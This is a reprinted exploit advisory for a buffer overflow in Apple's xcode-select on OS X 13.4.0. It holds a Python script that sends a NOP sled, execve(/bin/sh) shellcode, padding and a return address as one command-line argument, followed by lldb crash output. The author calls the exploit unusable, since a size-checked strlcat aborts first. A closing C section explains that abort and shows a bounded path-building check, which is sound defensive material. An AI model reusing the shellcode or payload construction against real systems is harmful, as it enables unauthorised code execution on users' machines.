xcode-select 13.4.0 Buffer Overflow
Source: vfocus.net  Author: Sacco  Published: 2014-09-24
# Exploit Title: xcode-select - buffer overflow
# Description: xcode-select controls the location of the developer directory used by xcrun(1), xcodebuild(1), cc(1), and other Xcode and BSD development tools.
# Date: Tuesday 23 2014
# Exploit Author: Juan Sacco
# Vendor Homepage: https://developer.apple.com
# Software Link: https://developer.apple.com/xcode/
# Version: 2333
# Tested on: 13.4.0 Darwin Kernel Version 13.4.0
# CVE : None

import os
import subprocess

junk = "\x90"*5631                 # NOP sled
# OSX/x86 intel - execve(/bin/sh) - 24 bytes
shellcode = "\x31\xc0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x50\x53\xB0\x3B\x6A\x2A\xCD\x80"

buffer = "\x90\x90\x90\x90"*89     # padding
eip = "\x7f\xff\x8e\x19\x98\x66"   # return address bytes as given by the author

print "# xcode-select is prone to an overflow"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes"

try:
    # the whole payload is passed as a single argument to xcode-select
    subprocess.call(["xcode-select", junk+shellcode+buffer+eip])
except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "xcode-select not found!"
    else:
        print "Error executing exploit"
        raise

Process 5932 launched: '/usr/bin/xcode-select' (x86_64)
Process 5932 stopped
* thread #1: tid = 0x8358c, 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
    frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
libsystem_kernel.dylib`__pthread_kill + 10:
-> 0x7fff8e199866:  jae    0x7fff8e199870            ; __pthread_kill + 20
   0x7fff8e199868:  movq   %rax, %rdi
   0x7fff8e19986b:  jmpq   0x7fff8e196175            ; cerror_nocancel
   0x7fff8e199870:  ret
(lldb)

(lldb) bt
* thread #1: tid = 0x8358c, 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x00007fff8e199866 libsystem_kernel.dylib`__pthread_kill + 10
    frame #1: 0x00007fff91b8a35c libsystem_pthread.dylib`pthread_kill + 92
    frame #2: 0x00007fff8a0a7b1a libsystem_c.dylib`abort + 125
    frame #3: 0x00007fff8a0a7c91 libsystem_c.dylib`abort_report_np + 181
    frame #4: 0x00007fff8a0cb860 libsystem_c.dylib`__chk_fail + 48
    frame #5: 0x00007fff8a0cb870 libsystem_c.dylib`__chk_fail_overlap + 16
    frame #6: 0x00007fff8a0cb892 libsystem_c.dylib`__chk_overlap + 34
    frame #7: 0x00007fff8a0cb795 libsystem_c.dylib`__strlcat_chk + 157
    frame #8: 0x0000000100006315 libxcselect.dylib`xcselect_find_developer_contents_from_path + 116
    frame #9: 0x0000000100000e75 xcode-select`___lldb_unnamed_function3$xcode-select + 57
    frame #10: 0x0000000100001562 xcode-select`___lldb_unnamed_function5$xcode-select + 1083a

(lldb) register r -a
General Purpose Registers:
       rax = 0x0000000000000000
       rbx = 0x00007fff769df310  libsystem_pthread.dylib`_thread
       rcx = 0x00007fff5fbfce18
       rdx = 0x0000000000000000
       rdi = 0x0000000000000d0b
       rsi = 0x0000000000000006
       rbp = 0x00007fff5fbfce40
       rsp = 0x00007fff5fbfce18
        r8 = 0x00000000fffffc00
        r9 = 0x00007fff5fbfce00
       r10 = 0x0000000008000000
       r11 = 0x0000000000000206
       r12 = 0x0000000000000400
       r13 = 0x000000000000000e
       r14 = 0x0000000000000006
       r15 = 0x00007fff5fbfd120
       rip = 0x00007fff8e199866  libsystem_kernel.dylib`__pthread_kill + 10
    rflags = 0x0000000000000206
        cs = 0x0000000000000007
        fs = 0x0000000000000000
        gs = 0x0000000000030000
       eax = 0x00000000
       ebx = 0x769df310
       ecx = 0x5fbfce18
       edx = 0x00000000
       edi = 0x00000d0b
       esi = 0x00000006
       ebp = 0x5fbfce40
       esp = 0x5fbfce18
       r8d = 0xfffffc00
       r9d = 0x5fbfce00
      r10d = 0x08000000
      r11d = 0x00000206
      r12d = 0x00000400
      r13d = 0x0000000e
      r14d = 0x00000006
      r15d = 0x5fbfd120
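The backtrace explains why the author calls this an unusable exploit: the abort originates in __strlcat_chk, the size-checked strlcat used by libxcselect when building the developer path, whose runtime check (here __chk_overlap) fired and called abort() before any return address was reached. The following is an added illustration, not code from the advisory or from Apple, of the bound check a caller can make explicit instead of relying on the checked variant; the 1024-byte buffer and the "/Contents/Developer" suffix are assumptions for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stddef.h>
#include <string.h>

/* Portable BSD-style strlcat: appends src to dst within dstsize bytes and
 * returns the length it tried to build; a result >= dstsize means the
 * output did not fit and was truncated (never overflowed). */
static size_t bsd_strlcat(char *dst, const char *src, size_t dstsize) {
    size_t dlen = strnlen(dst, dstsize);
    size_t slen = strlen(src);
    if (dlen == dstsize)
        return dstsize + slen;      /* no terminator in dst: append nothing */
    size_t room = dstsize - dlen - 1;
    size_t n = slen < room ? slen : room;
    memcpy(dst + dlen, src, n);
    dst[dlen + n] = '\0';
    return dlen + slen;
}

#define DEV_PATH_MAX 1024   /* assumed fixed buffer size (illustration only) */

/* Builds "<path>/Contents/Developer" into out[DEV_PATH_MAX] (suffix assumed).
 * Returns 0 when the whole string fits, -1 when the caller-supplied path
 * would not fit; out is left empty in that case instead of truncated. */
int build_developer_path(char out[DEV_PATH_MAX], const char *path) {
    out[0] = '\0';
    if (bsd_strlcat(out, path, DEV_PATH_MAX) >= DEV_PATH_MAX ||
        bsd_strlcat(out, "/Contents/Developer", DEV_PATH_MAX) >= DEV_PATH_MAX) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Feeds an argument shaped like the exploit's: 5631 bytes of filler
 * (constructed here). Returns 1 when the check rejects it cleanly. */
int oversize_argument_is_rejected(void) {
    static char big[5632];
    memset(big, 'A', 5631);
    big[5631] = '\0';
    char out[DEV_PATH_MAX];
    return build_developer_path(out, big) == -1 && out[0] == '\0';
}
```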
